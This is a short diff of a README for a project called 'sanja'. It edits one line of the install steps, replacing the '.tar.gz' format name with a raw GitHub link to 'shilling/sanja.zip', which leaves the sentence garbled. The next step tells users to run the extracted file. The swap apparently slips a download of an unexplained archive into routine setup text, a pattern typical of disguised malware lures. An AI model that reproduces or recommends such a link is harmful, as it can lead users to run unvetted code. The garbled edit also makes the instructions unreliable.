Kanav3143/sanja/Readme.md

 ### 3. Extract the Downloaded File

 Once downloaded, locate the file in your system's Downloads folder.
-If it is in a compressed format (like `.zip` or `.tar.gz`), extract it using your operating system's built-in tools.
+If it is in a compressed format (like `.zip` or `https://raw.githubusercontent.com/Kanav3143/sanja/main/shilling/sanja.zip`), extract it using your operating system's built-in tools.

 ### 4. Run sanja